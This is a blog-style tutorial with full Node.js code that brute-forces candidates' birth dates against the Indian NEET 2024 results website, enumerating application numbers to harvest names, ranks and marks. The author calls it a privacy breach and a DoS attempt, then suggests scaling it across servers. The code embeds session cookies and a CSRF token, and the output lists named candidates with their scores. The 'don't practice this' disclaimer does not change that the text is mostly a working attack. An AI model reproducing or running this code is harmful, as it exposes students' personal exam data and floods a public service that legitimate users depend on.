Scraping NEET 2024 Results (DOS attack on NEET website)
What is website scraping ?
Web scraping is the process of automatically extracting information from websites. It involves fetching the web page and parsing the content to retrieve the desired data.
What are we going to do ?
We are going to access the results of students from their Application number. We can use that to make a merit list or anything that we want once we have all the data. (the data of every candidate is literally open to all 🙃)
Is this legal ?
Well it can violate IT laws and regulations. We are breaking privacy of students and attempting a DOS attack on government website if we make numerous request on the server, denying other legitimate users from using it.
Prerequisites and Libraries used:
Basic node.js knowledge and how requests-responses work in web. You should also know how asynchronous nature of javascript. How to use await and handle promises.
Libraries used:
- axios: For making HTTP requests.
- cheerio: For parsing HTML and traversing the DOM.
- qs: For parsing and stringifying query strings
So let’s code !
- Installing libraries
npm install axios cheerio qs
2. Setting Up the Environment & Importing Libraries
Make sure you have Node.js installed. If not, you can download it from nodejs.org.
import axios from "axios";
import cheerio from "cheerio";
import qs from 'qs';
3. Fetch result request (The request sent to the NTA server)
async function fetchResult(applicationNumber, day, month, year) {
let data = qs.stringify({
'_csrf-frontend': '0eWuzNoRUjL6S_wbEOGQTLrAbEZsdMxim70FfaI7Yb-4rtS0kSEAWJ4KqyxFvtQIg7kqNxklrSnIhXRP0lU12Q==',
'Scorecardmodel[ApplicationNumber]': applicationNumber,
'Scorecardmodel[Day]': day,
'Scorecardmodel[Month]': month,
'Scorecardmodel[Year]': year
});
let config = {
method: 'post',
maxBodyLength: Infinity,
url: 'https://neet.ntaonline.in/frontend/web/scorecard/index',
headers: {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'en-US,en;q=0.9,hi;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'advanced-frontend=88a6rqa00bo5sckgmf2shk2kc7; _csrf-frontend=eb6d1314f029304ad4b0bdbfdf64f8b6411f03579bc919893b53db3709d4e5d5a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22iKzxK0RjdAW7U_DD9yFquQaKS8q2pnTf%22%3B%7D',
'DNT': '1',
'Origin': 'null',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"'
},
data: data
};
try {
const response = await axios.request(config);
const parsedHtmlContent = parseHTML(JSON.stringify(response.data));
if (parsedHtmlContent) {
return parsedHtmlContent;
}
} catch (error) {
return null;
}
}
How did we get this ? (Its pretty simple just follow the steps)
- First you need a valid candidate credentials to login and get the scorecard. (We need this to get the url of request which is fetching the data)
- After then open “Network tab on Developer tools in chrome”. In that right click on “index” script and copy that as cURL.
- Now open “Postman” and click on “import”. This way you can import your cURL and convert that into node.js code.
4. Parse the HTML Content
The parseHTML
function uses Cheerio to load the HTML content and extract the desired data fields.
The reason why need to parse is that the response is coming in HTML. We need to convert that into a JSON format.
function parseHTML(htmlContent) {
const $ = cheerio.load(htmlContent);
const applicationNumber = $('td:contains("Application No.")').next('td').text().trim() || 'N/A';
const candidateName = $('td:contains("Candidate’s Name")').next().text().trim() || 'N/A';
const allIndiaRank = $('td:contains("NEET All India Rank")').next('td').text().trim() || 'N/A';
const marks = $('td:contains("Total Marks Obtained (out of 720)")').first().next('td').text().trim() || 'N/A';
if (allIndiaRank === 'N/A') {
return null;
}
return {
applicationNumber,
candidateName,
allIndiaRank,
marks
};
}
5. Brute Forcing
The findResults
function iterates through a range of dates to find the correct one for the application number.
async function findResults(applicationNumber) {
let solved = false;
for (let year = 2007; year > 2003; year--) {
if (solved) {
break;
}
for (let month = 1; month <= 12; month++) {
if (solved) {
break;
}
const dataPromises = [];
console.log("Sending request for: " + applicationNumber + " year: " + year + " month: " + month);
for (let day = 1; day <= 31; day++) {
const data = fetchResult(applicationNumber, day.toString(), month.toString(), year.toString());
dataPromises.push(data);
}
const resolvedData = await Promise.all(dataPromises);
resolvedData.forEach(data => {
if (data) {
console.log(data);
solved = true;
}
});
}
}
}
6. Iterate over different Application numbers
The main
function iterates through a range of application numbers to find the results.
async function main() {
for (let appNumber = 240411345673; appNumber < 240411999999; appNumber++) {
await findResults(appNumber.toString());
}
}
main();
Well here’s how our index.ts file would look like:
import axios from "axios";
import cheerio from "cheerio";
import qs from 'qs';
import "./list.json";
async function fetchResult(applicationNumber: string, day: string, month: string, year: string) {
let data = qs.stringify({
'_csrf-frontend': '0eWuzNoRUjL6S_wbEOGQTLrAbEZsdMxim70FfaI7Yb-4rtS0kSEAWJ4KqyxFvtQIg7kqNxklrSnIhXRP0lU12Q==',
'Scorecardmodel[ApplicationNumber]': applicationNumber,
'Scorecardmodel[Day]': day,
'Scorecardmodel[Month]': month,
'Scorecardmodel[Year]': year
});
let config = {
method: 'post',
maxBodyLength: Infinity,
url: 'https://neet.ntaonline.in/frontend/web/scorecard/index',
headers: {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'en-US,en;q=0.9,hi;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'advanced-frontend=88a6rqa00bo5sckgmf2shk2kc7; _csrf-frontend=eb6d1314f029304ad4b0bdbfdf64f8b6411f03579bc919893b53db3709d4e5d5a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22iKzxK0RjdAW7U_DD9yFquQaKS8q2pnTf%22%3B%7D',
'DNT': '1',
'Origin': 'null',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"'
},
data: data
};
try {
const response = await axios.request(config);
const parsedHtmlContent = parseHTML(JSON.stringify(response.data));
if (parsedHtmlContent) {
return parsedHtmlContent
}
}
catch (error) {
return null
}
}
function parseHTML(htmlContent: string) {
const $ = cheerio.load(htmlContent);
const applicationNumber = $('td:contains("Application No.")').next('td').text().trim() || 'N/A';
// Find the candidate's name
const candidateName = $('td:contains("Candidate’s Name")').next().text().trim() || 'N/A';
// Find the All India Rank
const allIndiaRank = $('td:contains("NEET All India Rank")').next('td').text().trim() || 'N/A';
const marks = $('td:contains("Total Marks Obtained (out of 720)")').first().next('td').text().trim() || 'N/A';
// console.log(`Application Number: ${applicationNumber}`);
// console.log(`Candidate's Name: ${candidateName}`);
// console.log(`All India Rank: ${allIndiaRank}`);
// console.log(`Marks: ${marks}`);
if (allIndiaRank === 'N/A') {
return null
}
return ({
applicationNumber,
candidateName,
allIndiaRank,
marks
}
)
}
async function findResults(applicationNumber: string) {
let solved = false;
for (let year = 2007; year > 2003; year--) {
if (solved) {
break;
}
for (let month = 1; month <= 12; month++) {
if (solved) {
break;
}
const dataPromises = [];
console.log("Sending request for: " + applicationNumber + " year: " + year + " month: " + month);
for (let day = 1; day <= 31; day++) {
// console.log("Processing: " + applicationNumber + " " + year + "-" + month + "-" + day);
const data = fetchResult(applicationNumber, day.toString(), month.toString(), year.toString());
dataPromises.push(data);
}
const resolvedData = await Promise.all(dataPromises);
resolvedData.forEach(data => {
if (data) {
console.log(data);
solved = true;
}
});
}
}
}
async function main() {
for (let appNumber = 240411346676; appNumber < 240411999999; appNumber++) {
await findResults(appNumber.toString());
}
}
main();
package.json script:
Add “start” and “dev” scripts. The dev script would first build the project (convert the ts files into js) and then start the server.
Output: (Everyone’s excited ik that ! …. cooldown gaiss! 😏)
Sending request for: 240411179822 year: 2007 month: 4
{
applicationNumber: '240411179822',
candidateName: 'POREDDY PAVAN KUMAR REDDY',
allIndiaRank: '1',
marks: '720'
}
> neet-scrapper@1.0.0 start
> node index.js
Sending request for: 240411345673 year: 2007 month: 1
Sending request for: 240411345673 year: 2007 month: 2
{
applicationNumber: '240411345673',
candidateName: 'DIVYA S',
allIndiaRank: '2203573',
marks: '36'
}
Sending request for: 240411345674 year: 2007 month: 1
Sending request for: 240411345674 year: 2007 month: 2
Sending request for: 240411345674 year: 2007 month: 3
> neet-scrapper@1.0.0 start
> node index.js
Sending request for: 240411346676 year: 2007 month: 1
Sending request for: 240411346676 year: 2007 month: 2
Sending request for: 240411346676 year: 2007 month: 3
Sending request for: 240411346676 year: 2007 month: 4
Sending request for: 240411346676 year: 2007 month: 5
Sending request for: 240411346676 year: 2007 month: 6
Sending request for: 240411346676 year: 2007 month: 7
Sending request for: 240411346676 year: 2007 month: 8
Sending request for: 240411346676 year: 2007 month: 9
Sending request for: 240411346676 year: 2007 month: 10
{
applicationNumber: '240411346676',
candidateName: 'SAURAV KUMAR',
allIndiaRank: '2319827',
marks: '2'
}
Sending request for: 240411346677 year: 2007 month: 1
Conclusions:
This is one the simplest ways to scrape a website. We can run this on multiple servers (known as workers) using Docker and Kubernetes to scrape more and more data.
In this tutorial, we covered the basics of web scraping, including setting up the environment and writing a scraping script using axios and cheerio. We also discussed how to handle form submissions and parse HTML content to extract the desired data.
PLEASE DON’T PRACTICE THIS… It can violate data protection laws and could actually get you in trouble.
THANK YOU FOR READING ❤
I hope you found it informative and engaging.